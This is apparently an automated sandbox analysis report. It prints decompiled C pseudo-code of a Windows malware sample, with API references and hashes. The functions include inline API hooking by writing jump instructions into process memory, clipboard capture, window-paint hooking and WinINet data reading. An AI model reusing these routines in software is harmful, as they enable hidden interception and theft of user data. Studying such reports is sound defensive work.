    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 1850650832-0
    • Opcode ID: eef4e7b40a205c099c44fd660deb7ada8d9dc64efaa12c9a7b18c198df01e4a1
    • Instruction ID: 4f827263ba2e63c6e9ab5c2cfd29c4ea2926b1f40d47ad957ee41e258db1c62c
    • Opcode Fuzzy Hash: eef4e7b40a205c099c44fd660deb7ada8d9dc64efaa12c9a7b18c198df01e4a1
    • Instruction Fuzzy Hash: 8F41E470904204AFEF209F65CC49FEFBFB5EF84354F10452AF595A22A0D7398585CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E004161FD(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
    				long _v8;
    				DWORD* _v12;
    				intOrPtr _v47;
    				void _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t47;
    				void* _t58;
    				intOrPtr _t61;
    				void* _t62;
    				void* _t63;
    				intOrPtr* _t66;
    				long _t68;
    				DWORD* _t69;
    				void* _t71;
    
    				_t63 = __edx;
    				_t61 = __ecx;
    				_t58 = __eax;
    				_t69 = 0;
    				_v12 = 0;
    				if(E004161B8(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
    					L18:
    					return _v12;
    				} else {
    					E00411A74( &_v48,  &_v48, 0xffffff90, 0x23);
    					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
    						L17:
    						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
    						goto L18;
    					} else {
    						_t66 =  &_v48;
    						_push(0);
    						_push(_t66);
    						while(1) {
    							_t47 = E0041D9B0(_t58, _t61, _t63, _t66, _t69);
    							if(_t47 == 0xffffffff) {
    								break;
    							}
    							_t69 = _t69 + _t47;
    							if(_t69 > 0x1e) {
    								L16:
    								goto L17;
    							}
    							_t61 =  *_t66;
    							if(_t61 == 0xe9 || _t61 == 0xe8) {
    								if(_t47 == 5) {
    									 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 - _a8;
    								}
    							}
    							_push(0);
    							if(_t69 >= 5) {
    								_t17 = _t69 + 5; // 0x5
    								_t68 = _t17;
    								 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 - _a8 - 5;
    								 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
    								if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t68, ??) != 0) {
    									_t62 = _a4;
    									_v48 = 0xe9;
    									_v47 = _t58 - _t62 - 5;
    									E0041972D(_t62, _a8);
    									if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
    										_v12 = _t68;
    									}
    								}
    								goto L16;
    							}
    							_t66 = _t71 + _t69 - 0x2c;
    							_push(_t66);
    						}
    						goto L16;
    					}
    				}
    			}

    APIs
      • Part of subcall function 004161B8: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,004196CD,00000000,00000000,00000034,00419A58,00422008,00000000), ref: 004161CD
    • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,00405EF8,-00000008,00000034,?,?,004197EE,?,00000000,?,?,00419A58,00422008), ref: 0041622A
    • ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,004197EE,?,00000000,?,?,00419A58), ref: 00416251
    • WriteProcessMemory.KERNEL32(000000FF,00422008,?,00000005,00000000,?,00000000,00000000), ref: 004162CB
    • WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000), ref: 004162F3
    • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00405EF8,00405EF8,?,?,004197EE,?,00000000,?,?,00419A58,00422008,00000000,00405EF8), ref: 0041630B
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
    • String ID:
    • API String ID: 390532180-0
    • Opcode ID: b9c8a9fa11dee6ddc2340df223019b3efda4439838cb63544a01e672cb5941b9
    • Instruction ID: 1a6c424b6eea7adf7f62fde8d02dfc5aae6a1e6a5754b123583d2ed04a3e9ba8
    • Opcode Fuzzy Hash: b9c8a9fa11dee6ddc2340df223019b3efda4439838cb63544a01e672cb5941b9
    • Instruction Fuzzy Hash: 2D318372A00219AADF10AFFDCC44EDE7BA8DB09370F118356F935A61D0C774D9808B69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E00417F5F(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
    				int _v8;
    				void* _t37;
    				long _t38;
    				struct HBITMAP__* _t46;
    				void* _t47;
    				signed int _t56;
    				signed int _t57;
    				BITMAPINFO** _t62;
    				BITMAPINFO* _t64;
    
    				_t57 = __edx;
    				_v8 = 0;
    				_t64 = E00411991(0x428);
    				if(_t64 == 0) {
    					L14:
    					if(_a24 != 0) {
    						DeleteObject(_a24);
    					}
    					L16:
    					return _v8;
    				}
    				_t64->bmiHeader = 0x28;
    				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
    					L13:
    					E004119C1(_t64);
    					goto L14;
    				} else {
    					DeleteObject(_a24);
    					asm("cdq");
    					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
    					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
    					_a24 = 0;
    					_t64->bmiHeader.biHeight = _t56;
    					if(_t37 == 0) {
    						L7:
    						_t64->bmiHeader.biClrUsed = 0;
    						_push(8);
    						_t64->bmiHeader.biClrImportant = 0;
    						L8:
    						_pop(_t38);
    						_t64->bmiHeader.biBitCount = _t38;
    						L9:
    						_t62 = _a8;
    						asm("cdq");
    						_t58 = _t57 & 0x00000007;
    						asm("cdq");
    						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
    						_t64->bmiHeader.biCompression = 0;
    						if(_t62 != 0) {
    							 *_t62 = _t64;
    						}
    						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
    						_v8 = _t46;
    						if(_t46 == 0 || _t62 == 0) {
    							goto L13;
    						} else {
    							goto L16;
    						}
    					}
    					_t47 = _t37 - 3;
    					if(_t47 == 0) {
    						goto L7;
    					}
    					if(_t47 != 0x14) {
    						goto L9;
    					}
    					_push(0x20);
    					goto L8;
    				}
    			}

    APIs
    • GetDIBits.GDI32(00000000,0041A898,00000000,00000001,00000000,00000000,00000000), ref: 00417F97
    • GetDIBits.GDI32(00000000,0041A898,00000000,00000001,00000000,00000000,00000000), ref: 00417FAD
    • DeleteObject.GDI32(0041A898), ref: 00417FBA
    • CreateDIBSection.GDI32(00000000,00000000,00000000,00423E98,?,?), ref: 0041802A
    • DeleteObject.GDI32(0041A898), ref: 00418049
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: BitsDeleteObject$CreateSection
    • String ID:
    • API String ID: 1423349713-0
    • Opcode ID: e0704529bcbd1fdce6b7fae970e4add1ba2fe777b9e6b907139489dffc09a713
    • Instruction ID: 40559dcd694d4d123429646349e1dd915b7696b92f233c6086b9c32355f4dc25
    • Opcode Fuzzy Hash: e0704529bcbd1fdce6b7fae970e4add1ba2fe777b9e6b907139489dffc09a713
    • Instruction Fuzzy Hash: 7E31D6B210060AAFDF208F25CD849AB7FE9EF08384B05842FF985D6260C739DD91DB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0041B96D(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
    				intOrPtr _v28;
    				signed int _v44;
    				char _v52;
    				intOrPtr _v56;
    				char _v61;
    				intOrPtr _v64;
    				signed int _v72;
    				intOrPtr _v76;
    				char _v77;
    				intOrPtr _v84;
    				intOrPtr _v85;
    				char _v89;
    				void* __esi;
    				char _t31;
    				intOrPtr _t32;
    				char* _t37;
    				intOrPtr _t44;
    				intOrPtr* _t58;
    				intOrPtr _t62;
    				intOrPtr* _t63;
    				intOrPtr _t65;
    
    				_t63 = __edi;
    				ResetEvent(_a8);
    				_t31 = E00411991(0x1000);
    				_t65 = 0;
    				_v52 = _t31;
    				if(_t31 != 0) {
    					_t58 = __imp__InternetSetStatusCallbackW;
    					_t32 =  *_t58(_a4, E0041B924);
    					_t62 = 0x28;
    					_v56 = _t32;
    					 *_a12 = 0;
    					 *__edi = 0;
    					_v61 = 1;
    					E00411A74( &_v52,  &_v52, 0, _t62);
    					_v64 = _t62;
    					_v44 = _v72;
    					while(1) {
    						L3:
    						_t37 =  &_v52;
    						_v28 = 0x1000;
    						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
    						if(_t37 == 0) {
    							break;
    						}
    						if(_v44 != _t65) {
    							_t67 = _a12;
    							if(E0041194C( *_t63 + _v44, _a12) == 0) {
    								L9:
    								_v77 = 0;
    							} else {
    								E004119FD( *_t67 +  *_t63, _v76, _v44);
    								 *_t63 =  *_t63 + _v56;
    								_t65 = 0;
    								continue;
    							}
    						}
    						L10:
    						asm("sbb eax, eax");
    						 *_t58(_a4,  ~(_v72 + 1) & _v72);
    						E004119C1(_v84);
    						if(_v89 == 0) {
    							E004119C1( *_a12);
    						}
    						_t44 = _v85;
    						goto L13;
    					}
    					if(GetLastError() != 0x3e5) {
    						goto L9;
    					} else {
    						E0041512E( &_a8);
    						goto L3;
    					}
    					goto L10;
    				} else {
    					E004119C1(0);
    					_t44 = 0;
    				}
    				L13:
    				return _t44;
    			}

    APIs
    • ResetEvent.KERNEL32(?), ref: 0041B97B
    • InternetSetStatusCallbackW.WININET(?,0041B924), ref: 0041B9B0
    • InternetReadFileExA.WININET ref: 0041B9F0
    • GetLastError.KERNEL32 ref: 0041B9FA
    • InternetSetStatusCallbackW.WININET(?,?), ref: 0041BA5E
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
    • String ID:
    • API String ID: 4044253124-0
    • Opcode ID: 5c1972086a1d4a0a0853782985e7c98751ac124f3bffe0cd9e66b9385f752d0f
    • Instruction ID: 263768d4e3d02d07b60f54e9964b35cec6aa39e0937ba7c77b4c5ea1df5b5c5e
    • Opcode Fuzzy Hash: 5c1972086a1d4a0a0853782985e7c98751ac124f3bffe0cd9e66b9385f752d0f
    • Instruction Fuzzy Hash: 3831A0B1118345EFCB01DF65CC40AAEBBE8FF48344F00492AF99497261D738C994CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C5B6(struct HWND__* __ecx, intOrPtr* __edx) {
    				struct tagRECT _v24;
    				char _v28;
    				struct HWND__* _v32;
    				intOrPtr _v36;
    				struct HWND__* _v40;
    				void* __edi;
    				intOrPtr _t29;
    				signed int _t30;
    				RECT* _t52;
    				signed int _t54;
    				intOrPtr* _t61;
    
    				_t55 = __edx;
    				_t61 = __edx;
    				 *( *(__edx + 0x14)) = 0x3c;
    				_v32 = __ecx;
    				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
    					L12:
    					return 1;
    				}
    				_t29 =  *((intOrPtr*)(_t61 + 0x14));
    				_t54 =  *(_t29 + 0x24);
    				if((_t54 & 0x40000000) == 0) {
    					_t52 =  *_t61 + 0x24;
    				} else {
    					_t52 = _t61 + 4;
    				}
    				if((_t54 & 0x10000000) == 0) {
    					_t30 = 0;
    					goto L9;
    				} else {
    					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
    						L10:
    						E0040C445( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
    						_v36 =  *_t61;
    						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
    						if(GetTopWindow(_v40) != 0) {
    							E004160C7( &_v28, _t35);
    						}
    						goto L12;
    					}
    					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
    						goto L12;
    					}
    					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
    					L9:
    					if(_t30 == 0) {
    						goto L12;
    					}
    					goto L10;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Rect$IntersectWindow$EmptyInfo
    • String ID:
    • API String ID: 1664082778-0
    • Opcode ID: 3ac7d200c590fd5bbc5d4adb268f53059d357df87f962ce0771fe2e2e617c04d
    • Instruction ID: 48d0fa5ea1845324a5204aadeef972c21bf40a3147c560864f93f652eb586b88
    • Opcode Fuzzy Hash: 3ac7d200c590fd5bbc5d4adb268f53059d357df87f962ce0771fe2e2e617c04d
    • Instruction Fuzzy Hash: 89215EB1500301DBDB30DF28DD84A5BB7ECAF44714B050B2AF886E3251DB39E81A8B75
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040A352(void* __ecx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v104;
    				char _v204;
    				char _v724;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t18;
    				void* _t24;
    				void* _t26;
    				long _t28;
    				long _t35;
    				void* _t40;
    				WCHAR* _t43;
    				void* _t50;
    
    				_t50 = __eflags;
    				_t40 = __ecx;
    				SetThreadPriority(GetCurrentThread(), 0);
    				_t18 = E0040634D(_t40, _t50, 0x19367402, 1);
    				_v12 = _t18;
    				if(_t18 != 0) {
    					E00406312(0xff220829,  &_v204, 0);
    					_t43 =  &_v724;
    					E0040666E(_t40, _t43, 1);
    					PathQuoteSpacesW(_t43);
    					_t41 = _t43;
    					_v8 = E00412510(_t43);
    					_t24 = E00406473();
    					__eflags = _t24;
    					if(_t24 == 0) {
    						L7:
    						E00415194(_v12);
    						__eflags = 0;
    						return 0;
    					}
    					_t26 = 3;
    					E00419DD3(_t26,  &_v104);
    					_t28 = WaitForSingleObject( *0x4229f4, 0xc8);
    					__eflags = _t28 - 0x102;
    					if(_t28 != 0x102) {
    						L6:
    						goto L7;
    					}
    					_v8 = _v8 + _v8 + 2;
    					do {
    						E00415C40(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
    						_t35 = WaitForSingleObject( *0x4229f4, 0xc8);
    						__eflags = _t35 - 0x102;
    					} while (_t35 == 0x102);
    					goto L6;
    				}
    				return _t18 + 1;
    			}



















    APIs
    • GetCurrentThread.KERNEL32 ref: 0040A35D
    • SetThreadPriority.KERNEL32(00000000), ref: 0040A364
      • Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E
    • PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0040A3A7
    • WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 0040A3DF
    • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 0040A415
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
    • String ID:
    • API String ID: 123286213-0
    • Opcode ID: df236223baae1e25738383cd782500ac8301a2d5e5cc88e0b164ee8f4157e6bd
    • Instruction ID: 2b325332d5bdb500921781ca153ea54d3b56016a980df4b80f2286af398d617f
    • Opcode Fuzzy Hash: df236223baae1e25738383cd782500ac8301a2d5e5cc88e0b164ee8f4157e6bd
    • Instruction Fuzzy Hash: 5C21A471A00208BEDB11EBA0DD49FEE77ADEB44308F500076F901F7191DAB49E519B59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0041D325(void* _a4) {
    				signed int _t11;
    				void* _t21;
    				void* _t23;
    				void* _t24;
    				int _t25;
    
    				_t25 = _a4;
    				_t23 = GetClipboardData(_t25);
    				_a4 = _t23;
    				if(E00406473() == 0) {
    					return _t23;
    				}
    				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
    					L20:
    					return _a4;
    				} else {
    					_t21 = GlobalLock(_t23);
    					if(_t21 == 0) {
    						L19:
    						goto L20;
    					}
    					_t11 = _t25 - 1;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(0);
    						L12:
    						_t24 = E00411C01(_t11 | 0xffffffff);
    						L15:
    						if(_t24 != 0) {
    							EnterCriticalSection(0x424010);
    							E0041D022(0x404c3c);
    							E0041D022(_t24);
    							LeaveCriticalSection(0x424010);
    							if(_t24 != _t21) {
    								E004119C1(_t24);
    							}
    						}
    						GlobalUnlock(_a4);
    						goto L19;
    					}
    					_t11 = _t11 - 6;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(1);
    						goto L12;
    					}
    					if(_t11 != 6) {
    						_t24 = _a4;
    					} else {
    						_t24 = _t21;
    					}
    					goto L15;
    				}
    			}









    APIs
    • GetClipboardData.USER32 ref: 0041D32E
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • GlobalLock.KERNEL32 ref: 0041D362
    • EnterCriticalSection.KERNEL32(00424010,00000000,00000000), ref: 0041D3A2
    • LeaveCriticalSection.KERNEL32(00424010,00000000,00404C3C), ref: 0041D3B9
    • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 0041D3CC
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
    • String ID:
    • API String ID: 1109978993-0
    • Opcode ID: 8b9c6fc58f3d50b5bdc60fbcd026a31fa0d3de1716b66c980286557b20d91fa6
    • Instruction ID: d1cf1c9394f775619866213a00465160f987ab73033397a736e2680d1fa98aad
    • Opcode Fuzzy Hash: 8b9c6fc58f3d50b5bdc60fbcd026a31fa0d3de1716b66c980286557b20d91fa6
    • Instruction Fuzzy Hash: 601127B6D0011CA7CB111E699C84AEF6B199B89355B150137FD25E7360CB3C8CC296AF
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000002,00000000), ref: 00414EF8
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 00414F22
    • WSAGetLastError.WS2_32 ref: 00414F29
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414F55
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    • closesocket.WS2_32(?), ref: 00414F69
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
    • String ID:
    • API String ID: 2355469559-0
    • Opcode ID: d770af796127c7ce969bfb0037b0d61c0ec5abd71003652aea86083fdda22567
    • Instruction ID: 9f557ebcef03bf3ccdf17cd5f16f29e2306636648d2600cb3b0c409c63ac2c63
    • Opcode Fuzzy Hash: d770af796127c7ce969bfb0037b0d61c0ec5abd71003652aea86083fdda22567
    • Instruction Fuzzy Hash: 391121B1801128BFDB10AF65DD49CDF7E6CEF853A4B104125F509A6260D7349F81DAA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040C1BC(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
    				int _t20;
    				signed int _t21;
    				struct HWND__* _t28;
    				char* _t32;
    
    				_t28 = _a4;
    				if(( *0x422530 & 0x00000004) == 0 || E00406473() == 0) {
    					L9:
    					return GetUpdateRect(_t28, _a8, _a12);
    				} else {
    					_t32 = TlsGetValue( *0x423e7c);
    					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
    						goto L9;
    					} else {
    						if(_a8 != 0) {
    							_t6 = _t32 + 0xc; // 0xc
    							E004119FD( &_a8, _t6, 0x10);
    						}
    						if(_a12 != 0) {
    							_t20 = SaveDC( *(_t32 + 8));
    							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
    							RestoreDC( *(_t32 + 8), _t20);
    						}
    						 *_t32 = 1;
    						return 1;
    					}
    				}
    			}








    APIs
    • GetUpdateRect.USER32(?,?,?), ref: 0040C243
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • TlsGetValue.KERNEL32 ref: 0040C1DC
    • SaveDC.GDI32(?), ref: 0040C20C
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 0040C21C
    • RestoreDC.GDI32(?,00000000), ref: 0040C22E
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: be937d2d1928862ad7c2b8869f4d78214739bef62d4be18588d734f57feb79bf
    • Instruction ID: ffefb783a74f8a3e41984800a1598f9da48770ba7658382f9d033757a76e3880
    • Opcode Fuzzy Hash: be937d2d1928862ad7c2b8869f4d78214739bef62d4be18588d734f57feb79bf
    • Instruction Fuzzy Hash: 32118231500305EBCB219FA5DD88F9B7BA8EB05710F04867BF996E29B1C7389440CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0040C3B1() {
    				struct tagMSG _v32;
    				signed int _t12;
    				char _t17;
    				void* _t21;
    
    				SetThreadPriority(GetCurrentThread(), 1);
    				SetEvent( *0x423e84);
    				while(1) {
    					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
    					if(_t12 == 0xffffffff) {
    						break;
    					}
    					if(_t12 == 0) {
    						break;
    					}
    					if(_v32.message ==  *0x423e80 && _v32.wParam == 0xfffffffc) {
    						_t17 = E0040BC64( *0x423e88 + 0x114, _t19, _t21, 0x423e78, _v32.lParam, 1);
    						_t19 =  *0x423e88;
    						 *((char*)( *0x423e88 + 0x124)) = _t17;
    						SetEvent( *0x423e84);
    					}
    				}
    				return _t12 & 0xffffff00 | _t12 == 0x00000000;
    			}








    APIs
    • GetCurrentThread.KERNEL32 ref: 0040C3BE
    • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00406F37), ref: 0040C3C5
    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00406F37), ref: 0040C3D7
    • SetEvent.KERNEL32(00423E78,?,00000001), ref: 0040C424
    • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0040C431
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: EventThread$CurrentMessagePriority
    • String ID:
    • API String ID: 3943651903-0
    • Opcode ID: 8fb972f565ed3a4a5c8eb57b662121cb3ba829d3c5b2966bc93e8d08007bba5e
    • Instruction ID: f6ed974d804835e9870ade9f19b756a62aaf5ff28ad91f857aab1ddd5e1ce793
    • Opcode Fuzzy Hash: 8fb972f565ed3a4a5c8eb57b662121cb3ba829d3c5b2966bc93e8d08007bba5e
    • Instruction Fuzzy Hash: 65019231604204EBCA209B68AD46BAA77A4AB84730F55037AF920E21F0D7789916CB9D
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,74EDA660,00408688,00000000), ref: 00408255
    • ReleaseMutex.KERNEL32(?), ref: 00408289
    • IsWindow.USER32(?), ref: 00408290
    • PostMessageW.USER32(?,00000215,00000000,?), ref: 004082AA
    • SendMessageW.USER32(?,00000215,00000000,?), ref: 004082B2
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
    • String ID:
    • API String ID: 794275546-0
    • Opcode ID: cd6db6c4a674f2ffcbb895885744f84e28aa0331693c63fd7c1cc8077caf74c3
    • Instruction ID: 00a4dbb78de2dd5afb03c172a336ff561b356f9cde3b91d48412c8aa583deb50
    • Opcode Fuzzy Hash: cd6db6c4a674f2ffcbb895885744f84e28aa0331693c63fd7c1cc8077caf74c3
    • Instruction Fuzzy Hash: F5F0C9741047009FC3219F24DD48DA6BBB5FB99711B044BBDF896A37B1CB74A884DB25
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415D40(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char* _v28;
    				char* _v32;
    				signed int _t56;
    				WCHAR* _t57;
    				short* _t59;
    				signed short _t71;
    				char* _t77;
    				signed int _t84;
    				signed short* _t85;
    				signed int _t87;
    				intOrPtr _t88;
    				void* _t89;
    
    				_t87 = E00412D46(__eax & 0x000000ff, __ecx & 0x000000ff);
    				_v16 = _t87;
    				_t56 = E00412CFA();
    				_t77 = "bcdfghklmnpqrstvwxz";
    				if((_t56 & 0x00000100) == 0) {
    					_v32 = "aeiouy";
    					_v28 = _t77;
    				} else {
    					_v32 = _t77;
    					_v28 = "aeiouy";
    				}
    				_t84 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				if(_t87 > 0) {
    					_v20 = _a4 & 0x00000004;
    					do {
    						if(_v8 == 2) {
    							if((E00412CFA() & 0x00000100) == 0) {
    								_v32 = "aeiouy";
    								_v28 = _t77;
    							} else {
    								_v32 = _t77;
    								_v28 = "aeiouy";
    							}
    							_v8 = _v8 & 0x00000000;
    						}
    						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
    						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
    						if(_v20 == 0 || _t84 - _v12 <= 1 || (E00412CFA() & 0x00000101) != 0x101) {
    							_t71 =  *((char*)(E00412D46(_v24 - 1, 0) + _t88));
    						} else {
    							_t71 = 0x20;
    							_v12 = _t84;
    						}
